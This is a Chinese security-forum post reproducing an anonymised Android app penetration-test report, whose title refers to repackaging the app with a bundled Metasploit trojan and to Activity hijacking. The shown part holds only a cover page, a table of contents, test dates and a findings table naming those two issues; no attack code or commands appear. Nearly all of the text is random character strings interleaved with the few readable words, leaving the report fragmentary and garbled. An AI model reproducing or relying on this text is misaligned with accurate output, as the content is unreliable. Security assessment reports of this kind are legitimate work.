找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4355|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
: X% ^8 V2 a% _. l 6 Y: D9 `# }' I) E6 k4 w

/ n% z( g3 O; P& j; w0 y ' l1 ?! c0 n* _4 w0 f
P. O$ W. D- D4 k& X7 N, y ( B- E7 H5 @) J

- m& p$ m* l5 j1 e . ]' X Z" J# x" F
$ _0 z, O( v" }9 F 6 R$ \; y" K( E: A$ i* |8 a

$ P. d& j7 z4 Z2 K4 f6 F6 Q% D$ r0 d+ T! v8 {0 } 文档编号:                % U1 D+ b) `# O6 v. z$ O. l% o 0 G8 ~" Y* m, s

h @" ~, s9 ^. _, k/ ? 4 I8 ?- l" {: F, \. j! c

6 W5 b$ o1 i: V, d( o - h& Z) N2 C" S, b: y1 @! [   9 g- p5 b3 ]( O' \( a6 K9 N" U$ ^: r! M6 f

2 _3 ?: M& R. j9 _. _/ Z: }3 M) W# _1 h m3 [1 x t# f

# `% u6 D0 E0 R `/ p* w+ V1 Y# S0 x+ m8 D; o) ^. [8 X   5 N# L* x( h) h" t4 M $ \ G. Y6 i/ D! ]+ d

9 N! b, S" B" C& a, q2 @1 X- w2 c" n1 k. k t! P9 r( \- B, {

* q; @/ S" S+ J# d" p. u, h0 s4 H5 n1 r) I7 M7 W; H8 K   3 \5 y" e7 F. l9 v9 c , t0 L( L/ t, N0 ]" r

7 H. ^9 U s$ ~. m' p$ D2 J* a& p / d ~/ T( l+ A% E- H' K

! R$ O- B. O9 P p ' G5 W" ?: a% |& X6 b5 f0 c   7 X' p- z0 k3 z Y4 R ( E: e$ c2 {& n O8 p9 t

8 k# {; O3 k' }5 P) e* i% Z# F0 w $ `5 I2 @: k3 G8 S

" }0 n! K" ~: P! ]- y/ J. a5 n( j; R+ { 5 A; }3 a( n& P% W% s   8 N9 s' n, B, Q " [& D1 O' U! B; e' _

, i, P5 @8 P+ W# Y" z4 [/ S 0 B, X, y4 j# @

1 ?3 q' s# o/ Z4 n/ o+ g7 Z& g4 c/ T \4 J- B" C: p( c 某某某APP渗透测试 8 L1 k; n# J4 f; }+ M 0 [3 w/ S# [/ j

4 P j: C2 T7 k9 Y & [: w7 m, `# f! _; ?1 R

; _& P0 g6 X6 `* y + p: N( x- M/ `1 X   : {. c2 x8 C6 }- i; Q( ^& c& Z8 K9 W3 j; }

* a8 C, O5 I! q9 W4 C8 z. ` ( d% d& D! i. x. e3 U

" Z; e9 T {) n+ A7 ~$ F0 A4 [0 s6 i , g- u% B3 M* f. T. q( V. S   : k5 ~* u9 D. H: C: ] " r) j7 h" O# T5 ?7 O. s4 K

! f; H' A% e$ d$ |( t+ h . u! k, _" [6 D3 g9 e1 F5 B, Q( l% h

! W N; r" @5 V- c h! h( D6 u3 g( B4 j: h& @8 A: M   * o' y* ]3 A1 ?# L+ c9 o' ^8 h: s( r" b, m

, C9 B7 M) a0 t | * c- i" a' t. ^. {! b' }

( l/ v8 G* z+ K4 w9 v6 ^- \8 W: O2 h   ( U' M( w2 {: O( R) _7 c+ }) Y# N9 r# O9 @" h: N0 F: g3 [+ y

0 |0 @' i [$ A# o4 d0 {! M& y9 [7 `& m" W. H; f9 H* g: Z

. Y0 q5 N0 Q$ y" D* I+ r. l0 l1 Y! P# d. R 技 术 报 告 0 X/ g4 q- R' \) P; U; } 5 a7 b3 J( y; ~ ]2 N1 J9 P: j

. ?, n1 V) L4 b m6 d* M# e * M2 m/ h2 A; P, K1 Y1 m1 |0 \

. A; e! |7 K+ |1 B& A5 o2 P. ` 0 u6 j+ t/ l: F3 N! W0 u0 {/ O   : V. {6 Z; q9 _. u* h+ { 7 U% t( H; S5 c8 F- z" v) \6 b

# o( v& H% c5 v) R9 u# i; ` 1 p8 t& F9 F# Z1 x5 \7 s/ G/ V

: t+ E+ M; F$ s: g: T' O! r8 ?) y " D- m+ F. g! G( u7 Q   4 D( N6 f$ s6 {0 T! d' Z* _/ o6 B* ? 6 P0 Q& u8 }3 L2 p: |6 p

5 S9 |$ B0 e) x3 V% \1 F6 O 8 o, x" @. J2 A- |4 ~7 J

: f! P a0 |3 V. y : c, A4 k4 |' B# Y+ E$ w: z   . B* _ W% X z/ g- s) [9 V) d! l/ q ; @; Q. x. w& r; E- `

& u$ J: h' n# b1 X8 Z# Z4 }, D) P9 o$ D! s, n) Y

0 }8 t3 U @) E( [- a" |8 N! \ 7 x+ z4 o3 g1 Y   3 v8 y9 Z8 y# w ; y% L2 C9 t* M% v

! `% L- Z/ s9 j) K. X + I) f3 t$ L6 `6 Y+ l5 N

" f" M+ ^; b6 x/ R0 x + _7 J! n* A. a! t3 l   8 _4 K, a3 _" J + N: y d# r& ~7 C" G! `1 X; l- H

' u& M R: A- T: F, D. I4 N& C! n

4 J7 x) C& E. B" E& m* d2 P. t i3 ` ' |: r* N$ y% T9 p9 e   : w B I. r& w1 K0 w. p9 Q; X" O' p, E1 H

6 {+ H' ~1 V* ~7 s b+ f* n( M8 J& T( q3 I. H

& }8 u$ [) N3 {, x7 V* d) c9 O! u5 O$ w9 T% `   3 c- ^9 |1 m% O! f' O% A$ Q & S7 H( y) ^/ B6 `

* s$ u( `) p3 j+ R$ j! A8 n3 f5 Z4 ?5 a$ X* O

" J5 C: E0 M% J$ `1 U* @ D6 o 2 ~) M! n+ g3 b. H9 c9 u   # b! l1 A* e2 [; b0 O' p* k% G. }4 Q& u" V5 j. ]

# L+ K2 E0 u6 g9 Z' K % G$ f0 @+ o5 x! w" y3 v" A/ @8 U

# X$ Q( p/ i2 L6 \3 o5 Z! M5 }) x) G3 A* s# j: D7 h   9 o& y" t0 z3 l3 z & ^1 G i2 Z% V _- I

. l- m( }- D2 F5 u+ | $ _& O0 {- c2 o6 w! X

/ w' l: f- Q. L8 m0 R7 H% y$ y, n; u   + @: J- t* f# ?0 t3 i9 p " W+ j. h# @, g7 M3 Z9 i

0 X, K8 v! [% V+ ^$ @# N3 l" l6 K, k }3 ]

5 A+ s1 e4 A& ~4 ~ , { g0 R) p+ v& g2 N: W   . E. l4 K$ m, @* Y+ E0 I; @2 ]2 B) A" Z

/ ^3 G& v4 H( T$ k& y, [( i, ^. m - z0 t2 `* ^7 ?0 g" I" K- s

+ |8 l0 c! u6 v$ J! r+ h% M# T6 M6 Y8 ?& L2 T4 E$ X8 t* Y+ e1 h   " W0 T, r- Q/ R: B0 ` - i3 a3 ^6 \5 i6 F: ]

7 R) ?' s9 X y& O" P" J: i& u" l2 m! m K6 g# ?

1 ^7 t9 x' a" a; M0 ]9 I* Y& l ! X) L8 A- Q& z6 X9 U+ Y   0 A" ]4 v Q3 e 8 a: O+ q9 s2 n! v% }

9 @! P7 d2 c1 Z4 J( m+ \" x- u/ ^" x3 N# V$ |+ Y. e/ s! S4 r

6 U8 g2 h- ?/ } $ s* v+ G. Z* R3 M; X" \* D1 W   1 q( X. g9 c8 t8 y9 ?' Y / o$ K$ u( W/ @4 \) K1 N+ z

/ b* T4 N- l- a* W & p" l, ], I5 ?$ g

! I9 [$ }# J" e E& `2 o z I: h2 a- `1 s; g   ) ^9 H) I2 s0 A( w9 N 2 S* d! b/ l; K. O- Z% U* h

5 O5 W4 a/ z6 a 0 i5 v4 l2 I4 s' i

) ~, \( R9 _7 x+ M4 i/ \+ j6 v6 U' _7 l; O/ `# U! a P& F$ |+ R   * w5 G! q2 M* E) y , ?8 Q; g8 m7 A) U

& u7 w& @8 v& C ! t9 k' S) Q7 ]% Q! P

; |; Q; V% n# Q* M & i4 d& }2 u2 r( N( q9 W7 s9 K   , T% |8 }7 ^2 y1 a# ?% d$ H' O( n

7 A: p2 P" ^$ t; w 6 A: W' L& g& m$ Z

. o: S: C1 n* C! S( X) s $ B9 d/ ]2 Z0 S   # r1 D/ Z. L8 Q% k) q; G 5 W3 N1 W2 u3 t* Q5 r3 K# Z7 ^3 \4 e

' ?5 T$ V9 Q5 O! ` 4 @) r) [; ^' t6 S5 i5 I% O" }

/ F; r K! a A: W# A `5 E. f4 ]6 D4 p6 G( d: k3 u 二〇二〇年 9 N6 e; z! p/ ~% a& V & R5 m8 ?6 {: X

, m+ h! s8 y8 E9 H- g' _3 } # G- ?& O' ~8 d% e3 v* c
4 G$ @4 n+ X8 e0 c# M" }9 X 8 i+ k1 n$ W- [3 h( J! U
6 [ a T& i1 S7 R: X' A/ M, H% f8 l, o0 ] ! p- l; _* D; f; x 8 L# k4 c4 S% U- M; F
1 |$ P# F' Q6 s/ x2 c7 Q: L: X+ _ k2 ~1 \. r. D) x4 {* X* p
0 f) W. i8 \8 S& D/ O 2 {9 J( d Z9 H$ U! }6 a& m
% G6 q" ]: p6 i8 X, ] 1 l* P' ~5 t4 v2 F( ?' \ 6 \7 \- x1 [! X( K" g5 }% l% c) n( l- @+ h3 c5 }) f- p/ a
; y) U! v( v7 J- N4 z' Z0 I: t$ `4 f4 [ 5 q1 t @1 T i- _5 W, X$ `

% V8 s& ?/ v, M7 V+ S( k . E& h* R/ d Q 目 录 # R1 Z6 h; J, y8 S4 c3 i : r; J: y4 Y7 Q/ A# T

b; r1 Q) ~, X2 F& s- P. X . E7 a3 |! u, G. z. L . p% o% T9 s' M4 W3 {7 Z( ?% B5 p$ j# Y; W8 {* Q' w. v6 t- n

" Z* T! z3 E* q. _6 v* V# Y1 Y D; X1 D2 f   : r0 g$ ]1 x3 |3 W 2 P. V. S/ B1 X5 b

4 ^$ r& y; p. e 1 @( x9 t( A5 u4 V

# J1 N7 P$ `( b$ ]' H : u1 X P H# A( U- F+ \$ Y6 z" X, n6 y 1 概述... 3 & t* ]. C$ Q" u3 d- M% A* ~ 2 n2 ~1 X1 u s

2 b0 ]1 ~5 g P6 A8 J8 B* \ ! A; R! Q( [ L, @6 L* P+ t0 ~

/ q- R& T D9 }) Y d ; m% r: o0 a, U, c+ ] 1.2测试时间... 3 " ^- m8 c! ]* _0 l5 w$ v 1 a3 r z; z4 P- j: @; }4 ~2 l

$ B; v T9 q t( `$ q; e% m8 C ! b) y; z7 M8 D# a

( j$ m) F0 u+ @3 ?- E% l" }! b ) q! e' b( C# M* g; |: d4 m 1.3测试对象... 3 E9 t* x' v3 L- K% c1 c3 |, T Q+ v1 {

! ]' [* W/ H# W# i2 T3 R/ g2 O' V& T

" b' w p8 w0 f5 F: ~ n, F9 e; K3 V) g3 T0 f5 H 1.4测试结果... 3 * I7 H0 v P" | 4 b2 p7 |7 O8 L

1 d" x! a% I5 H& M* q" u R' m/ N- S/ F% y6 {

0 P' ~) y! `# h z ' N/ j6 x1 q+ N4 C* k 2 检测结果... 4 + z" B7 ]; ]' V0 V1 @; `7 \ 3 O$ ]7 m. |+ x$ H

% T+ }! x: l! ? 4 M5 w0 V$ [) y* x# {1 }

7 h5 X& g& q! R7 Q! ]0 c : G+ P3 k# }2 f2 H! Z- v- {: |! D 2.1 某某某... 4 q1 x s$ G- @ ) F! L1 a. n$ J

+ ] T. w$ Y6 M; B) s& J4 { a( w! l! W5 h1 N1 W

5 d+ r% b, K3 p& H " _, x2 f. Z+ {; c/ y 2.1.1检测目标... 4 ! k* J0 n/ X4 n* Z* |2 h! y$ M+ Z; Y+ u T8 P

) |' K/ a5 |% g! _$ G7 L4 t, u' c * r$ u& m+ ? p" C7 R4 d

2 y( s B0 N( G0 F 1 i! Y# A0 G) R! U7 {# O 2.1.2检测结果... 4 . U- a5 h' T0 V8 A* m ( M. M" ]- J% M7 v8 Q

0 y8 U7 M, D( m4 V; ` $ J0 I& n4 u; F8 Y' l- D

; R7 g! J# C* V% Z% ] 6 T) [( U5 z7 J% P+ R 2.1.2.1. 4 2 J7 f8 S/ d* V 6 n2 B9 j! Q' R: V0 h1 S+ N' I

4 x2 n7 Z1 Y9 G+ g7 E. W; c + Q; |7 [8 p8 `

% m, B/ i4 J2 g 0 \4 b' y( l3 N0 F5 ] 2.1.2.2. 6 , z; [0 h# s4 `, r+ I7 ? ( |4 V& G& p- `

3 u w' V5 @! i) X+ o9 r& }: E8 c F& W. y9 G0 i+ n

8 n# a! ~6 H- f) ` - k3 ^" ]5 ?/ e! p( a" U 1 n, J( G( h! D - q$ U& [0 S* {

; }* d2 t% {0 J, U1 ], p ) g6 d& K% ]3 }9 R% h/ ~* ? N1 C+ @& ~ Y2 H1 g ) J) Z. k) [ ^- L# [7 v) [5 |+ H
9 s9 I0 x' F3 }' C) f2 L# y3 P/ o. q; E" W
- g- }' Z2 ~+ s- s- R; ~4 M- X7 r8 e! P$ P & @2 ^! A! e/ V% @$ _ N- J ( j' b1 X9 R9 E

+ |4 v6 {- c) @% N: M , A: q/ h5 Y5 X5 t 1 概述 $ `; s" z7 T" g: q $ \9 t0 F6 z; x2 k" z) Y9 _

2 t. w: I' a. J6 B. Z6 B" n : L6 W- ^2 ?# Z; Z* O5 }2 N

( s* h7 c. X2 y) I' ~ Y* G2 R2 I9 s 2 L& C0 h4 V" m: F: t7 K q+ k 1.2测试时间 + j: s4 ~3 W5 d8 y# Y2 z2 L4 K6 b7 V/ o) ?/ X

+ G( o7 ]: t" N! |! L/ K8 v9 `+ }7 m% ]0 @4 E) C2 S, } " R# ~& q/ {( l% |, v( T( Z" H$ Z& J: [& B1 T2 N6 `" H' @/ X4 {( x* J- q7 T* s8 ~9 {5 m/ x1 ?; B+ k+ [( h8 _+ x. w9 |6 R+ F& Y2 v8 \7 N3 B( G" b! F- |0 {) o _& p" ^& @* ^9 t4 y% m8 C' Y- A& i K3 ? ?4 H. }9 r+ j2 c4 O* u4 `1 s! C, G( w. x( {9 q$ H- L2 l$ y9 _" t' S3 U8 u, X' p5 r% p/ }! _8 u- B2 j" S' u- V5 j. S1 U& F1 S* V5 i Q3 D* R' Z; [3 |2 f$ ], M! d/ `9 t! p5 l. T+ [1 z& C* o' g. g$ p& h, H1 n, T% J: M& w" y; |+ [- [* q5 e+ G6 [% o+ e+ k7 U" m, l4 v2 b4 _, f1 v9 |& S6 Z/ [8 g2 p9 g/ M( Y- f0 d; {8 Q r) L' ]5 R3 ~3 A6 U4 e* Z2 N9 o7 |0 F" ~* T+ l/ ^# E" c) U l& E$ P; y, h4 s) q' B$ r' u" z- v, T& [" i- f% q/ e6 z; f/ s$ j8 s% n4 W9 ]% y7 ]9 z/ x( e1 H- u5 s
! r- a2 t1 S9 C7 x X. u2 S! a/ j* `) d" g

: w5 k. v3 }% c5 t3 w' I9 }* C$ r2 g$ E) I" {' g! p 渗透测试时间 ) j2 z: _8 L2 Z + s1 E( N0 z/ s/ B) |$ u

h# w; d ^2 A0 u; t4 Z 8 p- g) G8 { |, F
7 b2 ~0 m' M; G; Q # q5 k2 w r3 e1 l

- y; K. o3 I0 n" P5 ?8 [. M" T* F$ W' a: a( k$ j) b& ^ 起始时间 5 ], s" F4 E0 ] ! X. E% k- T/ B/ A: G2 @

3 D- b3 n; s T! D- e& f5 ^6 _' N; R, G 		& n* y! V& S) W# K! y+ a1 c- D$ p! @; q) x( E# Z. b: H

" r; r, v# ]) L # l6 E/ W) f7 ~7 T 202046 ; U$ i, N" a' P& A6 u9 o8 x - S9 D9 P4 D: H- _

2 e0 A# o, F# G 6 h( T$ J2 f% O8 o E) R
+ E/ g6 i' B8 s! ?& T/ A" f & w1 n# u N1 O [

3 u, r7 C. N' Q3 C: ]2 p) e( W " N, y g1 m) w0 W: R# F8 p 结束时间 - y; }3 }! G# Q6 [# n 8 F( s4 o2 P2 ]% {

n: \* }0 g& x; I ' g0 Z! u7 H" O 		+ y( e# ~( H0 @2 r# c. D5 s$ |7 S, R" B$ K; K5 O9 {0 T

: \2 c& G" E$ y! o : k* h4 ^2 i# G, g& D 202049 # z$ e9 V! b3 t% B$ }8 m2 u! h% J. K9 H0 Q! h

- U: ~! ?. y- n1 l% k $ e% L! J/ G+ A* S/ S3 {! a$ V3 Q
( K2 ~- K9 Y: q& M . g; S" K' w8 }

- h. P9 N# r. g- T: _5 B' @$ I% `6 l* e 1.3测试对象 ! B8 I+ r, X- l' `+ Q& M' o8 ]. f U; |+ e

1 w* l: D/ X E. n8 L8 P& y3 c/ K0 t$ u

! _5 C& w% | \- {# |) j; ` ! _& O% M, q( J1 `! {& P; g6 I 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ) [- A( y, a# v$ p2 E2 W9 e$ I N' F& E6 U0 E4 r8 U

# G- W( C7 l8 ~ R ; S, j5 r. |: G% m$ t, a

- F1 O0 S+ B2 u2 y& R+ F 4 ~7 x4 m; n( A& d+ p: B; Y- Q( C 1-1 检测对象 + h4 c# ?1 Q; I1 X. F ( O1 }7 L; s' E) }* L! j

3 I9 K9 r0 b6 `' ? - C' T# s7 E# h, r$ c& R9 g 0 Y. p$ Q O: q' G& d& N) r3 t8 C7 R- w. q* B, \8 C, s* Y4 ~9 _, q$ }- @7 L# |9 P4 n% |. Q/ a) d2 m7 V/ a0 y/ ~* O8 L, C% V. j* l \3 p+ @# c& l; g4 P7 w1 g9 t. m, {4 C; W, x* e8 W: q' \9 R) D) z/ n$ j, g/ @' u) J F9 S, s) Q+ } Q/ ^+ V0 T0 p$ Y- H+ J8 J' ]- k1 L6 | o3 t% J, D- J: H( |+ ?/ l0 W! t9 T, q( _) p; d# H1 \4 n" `8 t. w% W# d$ c! ~+ q1 z/ u" B9 x& ?# H f: T4 N- p# `6 e. u3 F/ Z3 P& n) X1 o3 o6 g$ @ b7 {0 d: m( q0 v! ]6 g. a* B1 H/ m0 b5 z2 N3 v. q& g# l d' L, |* A; S% t+ [# C" J$ N0 e5 D1 x2 Z$ Y, [- v5 d: V( V* `( e' I; i# G/ C6 M/ P6 W' A4 q3 c, Q. E/ a" N# j4 \- E. b u0 X" m0 J" S: [7 a+ Q3 F/ a1 c% e/ Z* ]; E* C( W$ m \. j3 K5 F h; k) g# b5 p$ D) H2 h8 e, L' i! ?) N3 q
& V; u& M, ?" |* y5 H4 g* M ! E! ]" O* c2 ^' y' ]

) g: t# O/ e! R9 r, f 9 Y4 Y7 m; Z+ j, F9 t& A% k 序号 # k( v2 a: l" n n0 X5 R: K+ b" |" p: I) H, L( M; I- x. M6 |8 S* l

1 c2 f) _! ^8 U - p3 T1 o1 l% W* } f e7 c 		: E4 g ]1 I+ P# x * Q) r! u9 b, l* _ \6 B: F) Z

7 l, I8 s' o' | J ) ]+ j0 P& g9 c1 _# r 测试对象 & l$ ]+ t- u: \ ) Q! s: s. {) |% `% w! G# d

+ p1 ?4 v3 F; m. N ! j8 F+ B/ K' r$ C+ @* Q 		! Z1 M8 M3 q2 A2 Y % [% n' G9 ]3 r0 M6 _0 x1 ]( [

2 A2 J/ x. s; M6 v+ w6 @9 w8 Q 9 m) i. H) J- x$ b$ z. }% D: ` 测试地址 " K6 C( [5 h0 p( M3 b0 z* Y4 H! R

( I- z: n/ C. `3 u5 `" Q5 f! T . F H! s$ m8 f5 x5 } 		: t& ^9 H5 f7 [) e- Y E! g f% n2 M* I2 j0 a

6 p# D8 p) f+ W$ O7 X7 _1 u ' j/ h2 p% X, U+ S6 ? 安全漏洞 - \. u7 a! H& \* k0 n8 [; N% C7 H3 Y* u6 Z3 x5 T I

2 [2 K$ L1 m) [1 B, s$ T/ V, ^ # f7 _* R% o7 W$ ?9 n0 X2 n" g
" z& d, {8 F7 A" O. N! E 3 }, C h4 U0 I

8 x+ h- T- C6 Z : [& w% W$ a- x& X ^. z" j 1 ; _2 Z+ {4 r( `- W! e) L1 [+ Y7 M& \ # j8 ^- ]; v, l% F9 `3 n

i) Z1 g' i3 S# v8 l1 v3 y 3 T( R5 C0 X) @1 {; O 		2 E" M8 k y1 x5 f( M0 U5 h. B ' d$ n8 Y1 H3 r; O4 F# V

+ a$ R7 Y3 u& m( A4 u, e+ i# A! g& `5 B* U2 v5 O+ |; N3 b 某某某安卓APP ; }6 f7 S5 \0 j# w- A2 w- q( b3 n# v, d( M! ]" l8 {

1 C/ @. U# C' C, G 3 i, A6 a0 M( @, O1 h1 L9 c 		& ~0 c) o c3 o8 }, f ! ]+ d" O3 ]: K: \2 M* ? P4 p

~7 {: ^. g$ D0 I0 Q# T: D 9 A, f, X' f0 p0 `   - ]+ `' G$ q- {& ]) |& q$ }) _ U ' b7 G1 c+ |6 w* S# x# Q/ [

+ z5 ]6 m( s2 A6 E& ] & t% J8 k8 ]/ f4 q 		# g7 R1 i6 m7 V. x& l/ S# i6 Q 4 q' T2 k- w0 B

$ N6 C# }6 x9 F6 ~- c9 P$ ^" B 2 {9 K1 P! k m3 q: m6 l3 U 2 ( B5 e# D3 I4 ]& [( t ; y" g* w/ e( U9 {& @+ c

; Z! Q8 {! X% J% |$ A7 @+ } + J& z6 m5 j$ {; [" K
- U% t' e" j4 d/ c$ Y3 T! g , Z4 u$ U3 T9 L+ v4 n! i

3 J3 j* P' d' T2 X / n; k0 R W" m% `7 W! i' f 1.4测试结果 ( g2 A+ |5 t h; u + W9 Z2 k5 v: P; L

9 j4 F! `; e, N: \& a* b9 l8 j ( V; V% e- a# \0 n: Q

8 f( k1 i" G, T * i! s5 K$ F8 Z w 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 4 d, @/ A# |, `+ D1 }% m J& |7 [# l* B) C

% X' {/ t* B/ R- x. l 4 m; S' x8 @+ B0 _. }

# p$ o. c! _6 `3 v 0 c' Z3 |* p( T0 @# h# q; D   / r) |' x4 v" \) Y! M9 q7 k 2 u- O4 P+ }3 J( k) [. Z

! k/ I; t& z. e# S m/ n / E/ K; T* h1 |/ g/ [6 i$ J
# i9 Z# ]& `4 X$ |& a' w0 B" [3 d# u" `: J& e / x( z( j' p/ r. M% E8 N# Z6 X4 z1 R+ ^4 H8 E( w( @1 O6 Z8 M0 i- D7 r) W0 \, |2 q: \& f$ X; `3 A: p! q& ]6 m4 f) I p8 A/ {+ Q) ~7 f; b; W+ A, y7 c3 t8 t% l" b' q( P% [1 n+ o, D, {7 g4 f& t) \8 | f& z9 i$ ] |) C: I9 ^* l* H3 O6 [! X: t- [8 A' V- B# M4 E2 o/ {0 B9 Z A7 n' y* I: W0 N! P9 O' ^/ _. I, Q( p3 }( w7 l% }6 l6 |1 v% f: x& n- {0 g7 `3 k B) b: }1 _: O5 R0 }0 `' e* K" U3 B6 W+ t* Q- ]' n7 a0 ?: X1 [: {2 f3 ~7 N% j' d6 |7 f, {! y8 u9 w3 W0 N6 a4 e1 g+ t0 B3 G2 a! z, A i- m' ?5 w9 d. q. B- i# U) v; }& Q: U5 j3 b1 x6 K6 u% ~- Z3 D/ Y1 S" r/ F; P8 v: z6 B! o# H0 x' b3 m2 |( _+ i2 a0 o X; H) k; O4 c7 V, `, S( R7 ?2 A: n9 x4 I2 O5 @( z+ T, Y7 O& H1 I( Z; D+ \9 |' i" C% w! l4 N! P# n2 q5 f9 ~( c. r; l( @6 L6 y# T! a: z. G/ H+ _& w) U: {6 d# W/ ^' K, a |. _5 T4 G" c$ c1 m S/ u' Y% B1 n# {& u: n6 J5 O: f3 `+ A9 h; Y4 E0 _* L# f" Z( \$ v* ~5 M" j# F5 z# `! W$ g U9 R$ b0 `4 A& S% a9 B4 R5 D: M D4 [7 x3 k r; g; |& t9 E" V3 ]) a- x0 @& I7 b4 p! {* C) r# v& Y8 |. L6 _" N) |. J& v2 s i( p% \! F" Y9 F' I$ L. V/ r3 [' z9 h8 i0 I: q8 p$ t9 ~4 K6 I: h& k) T; U0 q9 v) L; L5 {% m+ _% y: [8 x! F4 w1 T5 o0 ~9 i# ]* Y' F4 H
: a5 I9 w/ Q9 [( f" [1 r `5 G/ i 3 x! M: s! x9 J% ?4 x

0 q* X, e- W F, r% z e3 E4 b8 G3 R9 Y/ @. S 序号 * B0 g- J( C E 5 G. a, i+ m: [) @3 Q! Z# A

9 S) P0 [9 p- f. i1 h% H3 S' E$ E/ U' u. `% m 		7 |( o. Q* U4 E% _ i0 i0 G ' U9 m6 [5 r- Q' s* _8 o# W: _9 ?

# b8 I6 e+ c R& Z % `( U6 H @4 Q0 I# H 系统名称 % g( d2 a) [# T) Q2 i r# P d) s . M: p6 b7 _" u: U# }# j

7 {- k% V, w: G8 Y9 T ' z2 K4 L$ k' z, M$ M 		n& m- d4 r9 I' v; Z 2 c. z" v n3 S* z

( o* `5 e; ?' u3 u% ~( } 5 B$ e+ m$ P$ X! R+ j8 G* Z0 i/ H 漏洞名称 # C- |2 ?9 a1 m 5 {: _* D3 {! l# M/ l

# F/ C5 j z- ] # n/ k8 ^5 L6 Y3 D 		$ Y! @6 ?/ f% x5 I3 _( T9 r n/ O( U- j! c. O V

" ]0 q- Z' o$ ]; g1 x8 D! v; D8 N! G$ A7 u/ m 漏洞危害 # Z% g$ h" Q0 N& b- k% g 3 o- O) _& f. @. J3 i4 _

, T7 _, L" C/ L% g- R# s o* W ~, K4 b) V3 `5 u 		* G0 Y. b l; e % q) f: L" G6 v7 C5 C

( x2 M0 _, j- x8 r 9 y# x) g+ Y2 `! Z 修复结果 9 v4 V/ |3 u. t" r4 V |- C5 O& O" }; V z/ u

7 A& \1 Y( X) S/ Q0 s + V* g, [ s6 M6 G: M( c! g7 e0 ~
% x3 n$ N( J3 _ : O* a6 q6 l# f7 t5 x

i A+ @8 T0 p" q9 u A" m( W! i* b# S! ?# A1 C 1 . r' Q( F2 E% x+ ]6 B + j+ ~' C, ?* z& H3 ^; a: _( x9 s

; T- W- }! p" z- ?* l& T' @" l) K! [! ?; Y' O/ r 		8 n! G, R( V: d3 \- ?! t : c' l3 O1 E! x; [+ {

5 S& M$ T: i# Y: I0 e/ a * d. V8 ?8 j Y3 @ 某某某某某某APP ! Q0 i( X$ b8 r, y$ ^6 E; }& F D6 w9 y x0 I) e& p3 \5 {

; j' m H! V0 u" ~5 x! m : N% B; p% Z" s9 x$ v 		7 w6 L/ w5 _: M c1 B3 k, j. M7 d, `2 Q' o( q* G

! m% c) r5 T. c- r1 }9 e ) t; o4 T! U( u- s3 q Activity 劫持 - [# x) [; A; D9 F& B2 z% y' [ / Q W$ s% e" ^' e

7 x# [. s$ }! g: L7 m9 k " G" L$ y- H% }$ B# V+ Z- |

* z( p! n6 K5 V9 C8 [8 E/ ~ : V( W- A) X! ]0 A% m: e   , y! T! i3 o5 Q" E _ ; @- |) h& a9 v/ n. ?8 B8 N6 _

! C1 o( o4 I. E. D% t* V3 u + X2 }2 V/ a( B1 m& d 		" A7 [4 \9 l; X + ]" q% r* p- m: f+ A. c( O* Z

% J+ k/ O6 G1 ?# }1 q$ w . Z E) }+ \3 u2 r9 W4 C0 F$ O ' S4 ?9 O0 M/ X. R 8 p# q! D M4 a( c$ ^

& m4 H- K: D* L4 b9 }" [+ p+ z% A 2 q& x) v X7 O2 H 		7 Q# E5 [ h/ H+ N' K( o: ^7 p. T# D8 @ S% A, |

8 ]: D. H% n: U+ g6 v3 \* O# \: R( l1 f5 ]+ d8 ~   * I% J+ t$ G1 k4 l1 ~% o. @: u: L1 b% C/ Z+ n9 {4 O" x) I2 }

8 i& q/ a8 s4 \: m( x- w m+ w) A! j
0 l& L6 g0 C* z) \" Y 0 j" n0 |& @ n

! {+ g n% o' t ) o3 C# ^5 s6 K. H# T 2 ) `7 v( s: p% K# w6 |; H D5 Z' p5 T8 x; J8 g3 T. v

" E p8 m+ @( @ 0 y" f6 a/ M; e9 c3 ~/ d4 G. Z 		X/ m3 n% ~# R . O1 Q; G! [( O. L

( {( ~! U7 e. p& }! ~1 F , X! g6 Y! }9 I2 | 某某某某某某APP ' W' l) n, ?* [ , @; E8 m' L3 U9 M9 U

- \+ \" O) l6 j : U. s5 s% z0 f) R 		: `- f8 \8 n. U/ r" o 1 S1 P& h9 K# ]- w

+ i( V3 N0 L5 }) ]$ M) x, k: q, y; a/ x% b3 x+ U 反编译二次打包捆绑木马、篡改APP代码 ' K1 S6 @# M* L# A( R: s- v% u: s/ f' _$ S * L8 Y; j0 H5 a: z5 }8 ~

+ w3 I' i/ G [ s1 Z3 E/ Q # k: k7 }6 V1 K) T* k# n 		; m k3 b+ H+ T: w5 | ) A- K6 z( ~, Y2 Z @

" x l7 q/ c7 t" G! J6 I; K& E5 K 9 b# l- x& ^5 J D& N, {0 j; D . _! S2 _6 g$ J

{/ z$ k& I, k8 z* d! \ $ y4 K9 N! r. } h+ l- L3 s 		( d, y8 D! y/ m: H$ \; a e( O( h# e4 X/ f5 w0 y. x, W8 L

0 ?6 t: C! i. j! l/ `2 L" Y) \6 L3 Y2 u" D   9 G4 d; P( |" ]4 f( ]& t, T- L7 r3 O, V& [

/ G+ H- H; P- o+ @: F7 [/ Q/ ^$ X. f. @( w
* `; f* M' \2 G* c7 U3 ~ : t! \- ~4 p1 [& [7 l% b" @) Q
2 e$ \- }; X) n6 c1 W' u8 j% |) n 3 P/ j- }3 l% {* Y

. N2 O3 L8 @- [! [% ] $ ] k/ ]6 J7 S+ D   " h8 f0 N) R) t4 h& e , t$ d; o6 \6 O! q6 [

/ g1 y5 ~8 a8 ~- s$ i5 M) t6 t, q" ^/ W6 o, p y8 V* U

/ o0 U2 ^. E( L9 o( U7 n/ C( g3 n. [* ^* Y2 O, N8 Y9 p! f 1-2 测试结果 ' R; R( [* C) ^- w* U9 D1 R" Z1 O3 |/ {% W |& [" X- {! h. _7 z

5 A, U2 |$ E! O; `2 v3 {& x G" B. r, f% @( x& ?

